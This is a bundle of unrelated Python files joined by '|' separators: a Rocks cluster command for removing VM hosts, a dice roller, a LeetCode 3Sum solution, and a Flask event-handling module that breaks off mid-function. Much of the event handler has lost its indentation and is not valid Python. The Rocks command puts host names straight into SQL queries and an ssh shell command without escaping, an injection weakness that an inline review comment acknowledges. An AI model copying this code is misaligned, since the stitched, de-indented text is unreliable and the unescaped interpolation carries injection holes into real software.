# Plugin to also remove any host-specific bootprofiles when removing vm host
#
# Revision 1.7 2008/09/02 18:03:16 phil
# support plugin to remove host-specific bootprofile when removing vm host
#
# Revision 1.6 2008/04/21 16:37:35 bruno
# nuked the vm_macs table -- now using the networks table to store/retrieve
# mac addresses for VMs
#
# Revision 1.5 2008/04/17 16:38:21 bruno
# incorporate phil's vm changes
#
# Revision 1.4 2008/03/06 23:42:04 mjk
# copyright storm on
#
# Revision 1.3 2008/02/01 21:38:54 bruno
# closer
#
# Revision 1.2 2008/02/01 21:27:53 bruno
# plugin for removing VM configuration info from the database
#
# Revision 1.1 2007/12/03 19:48:51 bruno
# xen for V
#
#
import os
import rocks.commands
class Command(rocks.commands.remove.host.command):
    """
    Remove the configuration info in the database for the supplied hosts.
    <arg type='string' name='host' repeat='1'>
    A list of one or more VM host names.
    </arg>
    <example cmd='remove host vm compute-0-0-0'>
    Remove the configuration info in the database for compute-0-0-0.
    </example>
    """

    def run(self, params, args):
        """For each named VM host: run removal plugins, delete its Xen config
        file on the physical host, then purge its vm_nodes/vm_disks rows.

        Silently skips hosts whose database lookups do not return exactly
        one row.  FIX: dropped the unused mem/cpus/macs/disks locals (and the
        redundant vmnodeid initializer) that were assigned but never read.
        """
        if not len(args):
            self.abort('must supply at least one host')
        for host in self.getHostnames(args):
            self.runPlugins(host)
            # NOTE(review): host names are interpolated directly into SQL.
            # They come from the rocks CLI rather than untrusted users, but
            # parameterized queries would be safer if the DB layer allows it.
            #
            # get the node id of the VM
            #
            rows = self.db.execute("""select vn.id from
                nodes n, vm_nodes vn where vn.node = n.id
                and n.name = '%s' """ % host)
            if rows != 1:
                continue
            vmnodeid, = self.db.fetchone()
            if not vmnodeid:
                continue
            #
            # get the name of the physical node that hosts
            # this VM
            #
            rows = self.db.execute("""select vn.physnode from
                vm_nodes vn, nodes n where n.name = '%s'
                and n.id = vn.node""" % (host))
            if rows == 1:
                physnodeid, = self.db.fetchone()
            else:
                continue
            rows = self.db.execute("""select name from nodes where
                id = %s""" % (physnodeid))
            if rows == 1:
                physhost, = self.db.fetchone()
            else:
                continue
            #
            # remove the configuration file on the physical node
            #
            os.system('ssh -q %s "rm -f /etc/xen/rocks/%s"' %
                (physhost, host))
            #
            # now remove the relevant rows in the database for
            # this VM
            #
            self.db.execute("""delete from vm_nodes where
                id = %s""" % (vmnodeid))
            self.db.execute("""delete from vm_disks where
                vm_node = %s""" % (vmnodeid))
|
import random
# Simple two-dice roller: keep rolling while the user answers "yes" or "y".
minNumber = 1
maxNumber = 6
rollAgain = "yes"
while rollAgain in ("yes", "y"):
    print("Rolling the dice...")
    first = random.randint(minNumber, maxNumber)
    second = random.randint(minNumber, maxNumber)
    print("The values are {} and {}".format(first, second))
    rollAgain = input("Roll the dice again?")
# The original while/else ran this unconditionally (no break in the loop),
# so a plain trailing statement is equivalent.
print("Game Over")
|
'''
15. 3Sum
Given an integer array nums, return all the triplets [nums[i], nums[j], nums[k]] such that i != j, i != k, and j != k, and nums[i] + nums[j] + nums[k] == 0.
Notice that the solution set must not contain duplicate triplets.
Example 1:
Input: nums = [-1,0,1,2,-1,-4]
Output: [[-1,-1,2],[-1,0,1]]
Example 2:
Input: nums = []
Output: []
Example 3:
Input: nums = [0]
Output: []
Constraints:
0 <= nums.length <= 3000
-105 <= nums[i] <= 105
'''
from typing import List
class Solution:
    """LeetCode 15 (3Sum): sort + two-pointer scan, O(n^2) time."""

    def threeSum(self, nums: List[int]) -> List[List[int]]:
        """Return all unique triplets [a, b, c] from nums with a + b + c == 0.

        Sorts nums in place, anchors each index i (skipping duplicate
        anchors), and runs a two-pointer pass over nums[i+1:].
        """
        result = []
        # First sort the array
        nums.sort()
        for i in range(len(nums)):
            if nums[i] > 0:
                # If the lowest val of a, b, c is greater than 0, break
                break
            # Skip duplicates
            if i == 0 or nums[i - 1] != nums[i]:
                # Run two sum on nums[i+1:]
                self.twoSum(nums, i, result)
        return result

    def twoSum(self, nums: List[int], i: int, result: List[List[int]]) -> None:
        """Append to result every pair in nums[i+1:] that cancels nums[i]."""
        lo, hi = i + 1, len(nums) - 1
        while lo < hi:
            # FIX: renamed the local from `sum`, which shadowed the builtin.
            total = nums[i] + nums[lo] + nums[hi]
            if total == 0:
                result.append([nums[i], nums[lo], nums[hi]])
                lo += 1
                hi -= 1
                # Skip duplicate lo values to avoid duplicate triplets.
                while lo < hi and nums[lo - 1] == nums[lo]:
                    lo += 1
            elif total > 0:
                hi -= 1
            else:
                lo += 1
|
from flask import jsonify
from psycopg2 import IntegrityError
from datetime import datetime
from app.DAOs.EventDAO import EventDAO
from app.handlers.RoomHandler import RoomHandler
from app.handlers.TagHandler import TagHandler
from app.handlers.UserHandler import UserHandler
from app.handlers.WebsiteHandler import WebsiteHandler
import app.handlers.SharedValidationFunctions as SVF
# Required top-level keys in the create-event JSON payload.
CREATEEVENTKEYS = ['roomid', 'etitle', 'edescription', 'estart', 'eend', 'photourl', 'tags', 'websites']
# Valid event status values.
ESTATUS_TYPES = ['active', 'deleted']
# Canonical timestamp format for all event date fields.
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
# Valid user/event interaction types.
ITYPES = ["following", "unfollowed", "dismissed"]
# Recommendation flags; presumably "R" = recommended, "N" = not -- TODO confirm.
RECOMMENDATION_TYPES = ["R", "N"]
# Common request-parameter key names.
SEARCHSTRING = 'searchstring'
TIMESTAMP = 'timestamp'
def _buildCoreEventResponse(event_tuple):
    """
    Private Method to build core event dictionary to be JSONified.
    Uses :func:`~app.handlers.RoomHandler.RoomHandler.safeGetRoomByID`
    :param event_tuple: response tuple from SQL query
    :returns Dict: Event information with keys:
    .. code-block:: python
        {'eid', 'ecreator', 'room', 'etitle', 'edescription',
        'estart', 'eend', 'ecreation',
        'estatus', 'estatusdate', 'photourl'}
    """
    # Single dict literal instead of field-by-field assignment; the tuple
    # layout matches the event SELECT column order.
    return {
        'eid': event_tuple[0],
        'ecreator': event_tuple[1],
        'room': RoomHandler().safeGetRoomByID(rid=event_tuple[2]),
        'etitle': event_tuple[3],
        'edescription': event_tuple[4],
        'estart': str(event_tuple[5]),
        'eend': str(event_tuple[6]),
        'ecreation': str(event_tuple[7]),
        'estatus': event_tuple[8],
        'estatusdate': str(event_tuple[9]),
        'photourl': event_tuple[10],
    }
def _buildEventResponse(event_tuple):
    """
    Private Method to build event dictionary to be JSONified.
    Uses:
    * :func:`~app.handlers.UserHandler.UserHandler.getUserByID`
    * :func:`~app.handlers.RoomHandler.RoomHandler.safeGetRoomByID`
    * :func:`~app.handlers.TagHandler.TagHandler.safeGetTagsByEventID`
    * :func:`~app.handlers.WebsiteHandler.WebsiteHandler.getWebistesByEventID`
    :param event_tuple: response tuple from SQL query
    :returns Dict: Event information with keys:
    .. code-block:: python
        {'eid', 'ecreator', 'room', 'etitle', 'edescription',
        'estart', 'eend', 'ecreation',
        'estatus', 'estatusdate', 'photourl',
        'tags', 'websites'}
    """
    eid = event_tuple[0]
    return {
        'eid': eid,
        # This SHOULD not break, since every event SHOULD have a user.
        'ecreator': UserHandler().getUserByID(uid=event_tuple[1], no_json=True),
        'room': RoomHandler().safeGetRoomByID(rid=event_tuple[2]),
        'etitle': event_tuple[3],
        'edescription': event_tuple[4],
        'estart': str(event_tuple[5]),
        'eend': str(event_tuple[6]),
        'ecreation': str(event_tuple[7]),
        'estatus': event_tuple[8],
        'estatusdate': str(event_tuple[9]),
        'photourl': event_tuple[10],
        'tags': TagHandler().safeGetTagsByEventID(eid=eid),
        'websites': WebsiteHandler().getWebistesByEventID(eid=eid, no_json=True),
    }
def _buildTinyEventResponse(event_tuple):
"""
Private Method to build tiny event dictionary to be JSONified.
:param event_tuple: response tuple from SQL query
:returns Dict: Event information with keys:
.. code-block:: python
{'eid', 'estart', 'eend', 'ecreation',
'estatus', 'estatusdate'}
"""
response = {}
response['eid'] = event_tuple[0]
response['estart'] = str(event_tuple[5])
response['eend'] = str(event_tuple[6])
response['ecreation'] = str(event_tuple[7])
response['estatus'] = event_tuple[8]
response['estatusdate'] = str(event_tuple[9])
return response
def _validateEventParameters(json, uid):
    """
    Private method to validate the parameters passed via JSON to create an event.
    Uses :func:`~app.handlers.EventHandler._validateTimestamp`
    :param json: JSON used to create event.
    :param uid: User ID of person trying to create the event.
    :raises: ValueError
    """
    def _positive_int(value, message):
        # Shared check for ids that must be positive integers.
        if not isinstance(value, int) or value <= 0:
            raise ValueError(message + str(value))

    def _nonblank_string(value, field):
        # Shared check for required, non-whitespace text fields.
        if not isinstance(value, str) or value.isspace() or value == '':
            raise ValueError(field + " value not valid: " + str(value))

    _positive_int(uid, "ecreator uid value not valid: ")
    _positive_int(json['roomid'], "roomid value not valid: ")
    _nonblank_string(json['etitle'], "etitle")
    _nonblank_string(json['edescription'], "edescription")
    for field in ('estart', 'eend'):
        if not isinstance(json[field], str) or not _validateTimestamp(datestring=json[field]):
            raise ValueError(field + " value not valid: " + str(json[field]))
    if not _validateStartEndDates(start=json['estart'], end=json['eend']):
        raise ValueError(
            "eend [{end}] must be greater than estart [{start}]".format(end=json['eend'], start=json['estart']))
    if json['photourl'] is not None:
        _nonblank_string(json['photourl'], "photourl")
    if not isinstance(json['tags'], list):
        raise ValueError("Array of tags provided improperly: " + str(json['tags']))
    if json['websites'] is not None and not isinstance(json['websites'], list):
        raise ValueError("Array of websites provided improperly: " + str(json['websites']))
def _validateItype(itype):
    """
    Validates itype.
    :param itype: type of interaction
    :return: bool
    """
    # Direct membership test against the module-level interaction whitelist.
    return itype in ITYPES
def _validateTimestamp(datestring):
    """
    Validates timestamp
    :param: datestring
    :return: bool
    """
    try:
        # Round-trip through strptime/strftime: only strings already in the
        # canonical DATETIME_FORMAT survive unchanged.
        return datestring == datetime.strptime(datestring, DATETIME_FORMAT).strftime(DATETIME_FORMAT)
    except ValueError:
        return False
def _validateStartEndDates(start, end):
    """
    Validate that Event Start time is not less than the end time.
    :param start: Start timestamp
    :param end: end timestamp
    :return: bool
    """
    start_dt = datetime.strptime(start, DATETIME_FORMAT)
    end_dt = datetime.strptime(end, DATETIME_FORMAT)
    return start_dt < end_dt
def _validate_uid_eid(uid, eid):
"""
Validate that a User ID and Event ID are integers.
:param uid: User ID
:param eid: Event ID
:raises: ValueError
"""
if not isinstance(uid, int) or uid < 0:
raise ValueError("Invalid uid: " + str(uid))
if not isinstance(eid, int) or eid < 0:
raise ValueError("Invalid eid: " + str(eid))
class EventHandler:
"""
Handler Class to manage getting/creating/modifying events and event-user interactions.
"""
# todo: extract all/most of hardcoded key names to variables.
    def createEvent(self, json, uid):
        """Attempt to create an event.
        Uses :func:`~app.DAOs.EventDAO.EventDAO.createEvent` as well as:
        * :func:`~app.handlers.TagHandler.TagHandler.unpackTags`
        * :func:`~app.handlers.WebsiteHandler.WebsiteHandler.validateWebsites`
        :param uid: User ID.
        :type uid: int
        :param json: JSON object with the following keys:
        * roomid
        * etitle
        * edescription
        * estart
        * eend
        * photourl
        * websites
        * tags
        :type json: JSON
        :returns JSON Response Object: JSON Response Object containing success or error response.
        """
        # Reject early if any required key is missing from the payload.
        for key in CREATEEVENTKEYS:
            if key not in json:
                return jsonify(Error='Missing credentials from submission: ' + key), 400
        try:
            _validateEventParameters(json=json, uid=uid)
            tags = TagHandler().unpackTags(json_tags=json['tags'])
            WebsiteHandler().validateWebsites(list_of_websites=json['websites'])
        except ValueError as e:
            return jsonify(Error=str(e)), 400
        except KeyError as ke:
            return jsonify(Error="Missing Key in JSON: " + str(ke)), 400
        # Events must carry between 3 and 10 unique tags.
        if len(tags) < 3 or len(tags) > 10:
            return jsonify(Error="Improper number of unique tags provided: " + str(len(tags))), 400
        eid = EventDAO().createEvent(ecreator=uid, roomid=json['roomid'], etitle=json['etitle'],
                                     edescription=json['edescription'], estart=json['estart'],
                                     eend=json['eend'], photourl=json['photourl'], tags=tags,
                                     websites=json['websites'])
        # The DAO returns an indexable row on success; anything
        # non-indexable is treated as an error description.
        try:
            eid = eid[0]
        except TypeError:
            return jsonify(Error=str(eid)), 400
        return jsonify({"eid": eid}), 201
def getAllDeletedEventsSegmented(self, offset, limit=20):
"""Get all events that have been marked as deleted.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getAllDeletedEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param offset: Number of results to skip from top of list.
:type offset: int
:param limit: Number of results to return. Default = 20.
:type limit: int
:returns JSON Response Object: JSON Response Object containing success or error response.
"""
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getAllDeletedEventsSegmented(offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
event_entry = _buildCoreEventResponse(event_tuple=row)
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getAllEventsSegmented(self, offset, limit=20):
"""Get all events.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getAllEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param offset: Number of results to skip from top of list.
:type offset: int
:param limit: Number of results to return. Default = 20.
:type limit: int
:returns JSON Response Object: JSON Response Object containing success or error response.
"""
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getAllEventsSegmented(offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
event_entry = _buildCoreEventResponse(event_tuple=row)
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getAllPastEventsSegmented(self, offset, limit=20):
"""Get all events whose end dates are equal to or less than the current timestamp of the database.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getAllPastEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param offset: Number of results to skip from top of list.
:type offset: int
:param limit: Number of results to return. Default = 20.
:type limit: int
:returns JSON Response Object: JSON Response Object containing success or error response.
"""
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getAllPastEventsSegmented(offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
event_entry = _buildCoreEventResponse(event_tuple=row)
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getEventByID(self, eid, no_json=False):
"""Return the event entry belonging to the specified eid.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getEventByID` as well as
:func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param eid: Event ID
:type eid: int
:param no_json: States whether or not to return the successful response as a dictionary.
:type no_json: bool
:returns JSON Response Object: JSON Response Object containing success or error response.
"""
if not isinstance(eid, int) or not eid > 0:
return jsonify(Error="Invalid eid: " + str(eid)), 400
event = EventDAO().getEventByID(eid)
if not event:
return jsonify(Error='Event does not exist: eid=' + str(eid)), 404
else:
response = _buildEventResponse(event_tuple=event)
if no_json:
return response
return jsonify(response)
def getEventByIDWithInteraction(self, eid, uid):
"""Return the event entry belonging to the specified eid, plus the user interaction entry for the given uid.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getEventInteractionByUserID` as well as
:func:`~app.handlers.EventHandler.getEventByID`
:param eid: Event ID
:type eid: int
:param uid: User ID
:type uid: int
:returns JSON Response Object: json response with event IDs and tags for each event.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
if not isinstance(eid, int) or not eid > 0:
return jsonify(Error="Invalid eid: " + str(eid)), 400
event_response = self.getEventByID(eid=eid, no_json=True)
# If it's not a dictionary, it is an error JSON.
if not isinstance(event_response, dict):
return event_response
# TODO: consider moving this to User Handler/Dao
user_interaction = EventDAO().getEventInteractionByUserID(eid=eid, uid=uid)
# If no interaction found, object is None; replace with None tuple
if not user_interaction:
user_interaction = [None, None]
event_response["itype"] = user_interaction[0]
event_response["recommendstatus"] = user_interaction[1]
return jsonify(event_response)
def getEventsCreatedAfterTimestamp(self, timestamp, uid):
"""
Get the upcoming active event IDs that a user has not interacted with,
along with the tags for that event.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getEventIDsCreatedAfterTimestamp` as well as:
* :func:`~app.handlers.TagHandler.TagHandler.safeGetTagsByEventID`
* :func:`~app.handlers.EventHandler._validateTimestamp`
:param timestamp: ISO formatted timestamp string. ("%Y-%m-%d %H:%M:%S")
:type timestamp: str
:param uid: the user's ID.
:type uid: int
:returns JSON Response Object: json response with event IDs and tags for each event.
"""
if not isinstance(timestamp, str) or not _validateTimestamp(datestring=timestamp):
return jsonify(Error='Invalid timestamp: ' + str(timestamp)), 400
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
event_ids = EventDAO().getEventIDsCreatedAfterTimestamp(uid=uid, timestamp=timestamp)
if not event_ids:
response = {'events': None}
else:
event_list = []
for row in event_ids:
event_entry = {"eid": row[0], "tags": TagHandler().safeGetTagsByEventID(eid=row[0])}
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getEventsCreatedByUser(self, uid, offset, limit=20):
"""Return the events created by a given user, specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getEventsCreatedByUser` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events created by a user.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getEventsCreatedByUser(uid=uid, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
# TODO: consider re-developing Response builders for more flexibility.
event_entry = _buildCoreEventResponse(event_tuple=row)
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getDismissedEvents(self, uid, offset, limit=20):
"""Return the dismissed event entries specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getDismissedEvents` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events dismissed by a user.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getDismissedEvents(uid=uid, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
# TODO: consider re-developing Response builders for more flexibility.
event_entry = _buildCoreEventResponse(event_tuple=row)
event_entry['recommendstatus'] = row[11]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getNewDeletedEvents(self, timestamp):
"""
Get a list of the core information for events deleted at or after the given timestamp.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getNewDeletedEvents` as well as:
* :func:`~app.handlers.EventHandler._validateTimestamp`
* :func:`~app.handlers.EventHandler._buildTinyEventResponse`
:param timestamp: Time used to look for events that have been deleted at or after. ("%Y-%m-%d %H:%M:%S")
:type timestamp: str
:returns JSON Response Object: JSON containing limit-defined number of events dismissed by a user.
"""
if not isinstance(timestamp, str) or not _validateTimestamp(datestring=timestamp):
return jsonify(Error='Invalid timestamp: ' + str(timestamp)), 400
events = EventDAO().getNewDeletedEvents(timestamp=timestamp)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
event_entry = _buildTinyEventResponse(event_tuple=row)
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getPastFollowedEventsSegmented(self, uid, offset, limit=20):
"""Return the user's followed event entries that have ended, specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getPastFollowedEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events followed by a user that have ended.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getPastFollowedEventsSegmented(uid=uid, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
# TODO: consider re-developing Response builders for more flexibility.
event_entry = _buildCoreEventResponse(event_tuple=row)
event_entry['recommendstatus'] = row[11]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getUpcomingFollowedEventsSegmented(self, uid, offset, limit=20):
"""Return the upcoming, active, followed event entries specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getUpcomingFollowedEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events followed by a user that have not ended.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getUpcomingFollowedEventsSegmented(uid=uid, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
# TODO: consider re-developing Response builders for more flexibility.
event_entry = _buildCoreEventResponse(event_tuple=row)
event_entry['recommendstatus'] = row[11]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getUpcomingGeneralEventsSegmented(self, uid, offset, limit=20):
"""Return the upcoming, active event entries specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getUpcomingGeneralEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events that have not ended.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getUpcomingGeneralEventsSegmented(uid=uid, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
event_entry = _buildCoreEventResponse(event_tuple=row)
# TODO: Consider reworking generalEventsSegmented and builder.
event_entry['itype'] = row[11]
event_entry['recommendstatus'] = row[12]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getUpcomingGeneralEventsByKeywordsSegmented(self, uid, searchstring, offset, limit=20):
"""Return the upcoming, active event entries specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getUpcomingGeneralEventsByKeywordsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.SharedValidationFunctions.processSearchString`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param searchstring: String to use as search criteria for general events. Search terms must be separated by whitespaces.
:type searchstring: str
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events that have not ended and match search criteria.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
# Process keywords to be filtered and separated by pipes.
keywords = SVF.processSearchString(searchstring=searchstring)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getUpcomingGeneralEventsByKeywordsSegmented(uid=uid, keywords=keywords, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
event_entry = _buildCoreEventResponse(event_tuple=row)
# TODO: Consider reworking generalEventsSegmented and builder.
event_entry['itype'] = row[11]
event_entry['recommendstatus'] = row[12]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getUpcomingRecommendedEventsSegmented(self, uid, offset, limit=20):
"""Return the upcoming, active, recommended event entries specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getUpcomingRecommendedEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events recommended to a user that have not ended.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getUpcomingRecommendedEventsSegmented(uid=uid, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
# TODO: consider re-developing Response builders for more flexibility.
event_entry = _buildCoreEventResponse(event_tuple=row)
event_entry['itype'] = row[11]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getUpcomingRecommendedEventsByKeywordSegmented(self, uid, searchstring, offset, limit=20):
"""Return the upcoming, recommended, active event entries specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getUpcomingRecommendedEventsByKeywordSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.SharedValidationFunctions.processSearchString`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param searchstring: String to use as search criteria for recommended events. Search terms must be separated by whitespaces.
:type searchstring: str
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of recommended events that have not ended and match search criteria.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
# Process keywords to be filtered and separated by pipes.
keywords = SVF.processSearchString(searchstring=searchstring)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getUpcomingRecommendedEventsByKeywordSegmented(uid=uid, keywords=keywords, offset=offset,
limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
# TODO: consider re-developing Response builders for more flexibility.
event_entry = _buildCoreEventResponse(event_tuple=row)
event_entry['itype'] = row[11]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def setEventStatus(self, uid, eid, estatus):
"""Set the estatus of an event entry to the specified value.
Uses :func:`~app.DAOs.EventDAO.EventDAO.setEventStatus` as well as
:func:`~app.handlers.EventHandler._validate_uid_eid`
:param uid: User ID
:type uid: int
:param eid: Event ID.
:type eid: int
:param estatus: New status for event. Current Accepted statuses: ['active', 'deleted']
:type estatus: str
:returns JSON Response Object: JSON containing successful post response.
"""
try:
_validate_uid_eid(uid=uid, eid=eid)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
if not isinstance(estatus, str) or estatus not in ESTATUS_TYPES:
return jsonify(Error='Invalid estatus = ' + str(estatus)), 400
uid_eid_pair = EventDAO().setEventStatus(eid=eid, estatus=estatus, uid=uid)
try:
return jsonify({"eid": uid_eid_pair[0]}), 201
except TypeError:
return jsonify(Error=str(uid_eid_pair)), 400
def setInteraction(self, uid, eid, itype):
"""Set an eventuserinteractions entry that states the user has interacted with the specified event.
Uses :func:`~app.DAOs.EventDAO.EventDAO.setInteraction` as well as:
* :func:`~app.handlers.EventHandler._validate_uid_eid`
* :func:`~app.handlers.EventHandler._validateItype`
* :func:`~app.handlers.TagHandler.TagHandler.buildCoreUserTagResponse`
* :func:`~app.DAOs.EventDAO.EventDAO.getEventByID`
* :func:`~app.handlers.EventHandler._buildTinyEventResponse`
:param uid: User ID
:type uid: int
:param eid: Event ID.
:type eid: int
:param itype: type of interaction. Currently accepted interactions: ["following", "unfollowed", "dismissed"]
:type itype: str
:returns JSON Response Object: JSON containing post response.
"""
try:
_validate_uid_eid(uid=uid, eid=eid)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
if not isinstance(itype, str) or not _validateItype(itype=itype):
return jsonify(Error="Invalid itype: " + str(itype)), 400
# dao = EventDAO()
result = EventDAO().setInteraction(uid=uid, eid=eid, itype=itype)
# TODO: Implement a better way to do this error handling.
try:
new_usertags = []
for row in result:
new_usertags.append(TagHandler().buildCoreUserTagResponse(tag_tuple=row))
# Calling this within the try block, because if the setInteraction call fails,
# psql will block all transactions until current one finishes, and will cause
# a 500 error instead of the intended 400 below.
event = EventDAO().getEventByID(eid=eid)
tiny_event = _buildTinyEventResponse(event_tuple=event)
response = {}
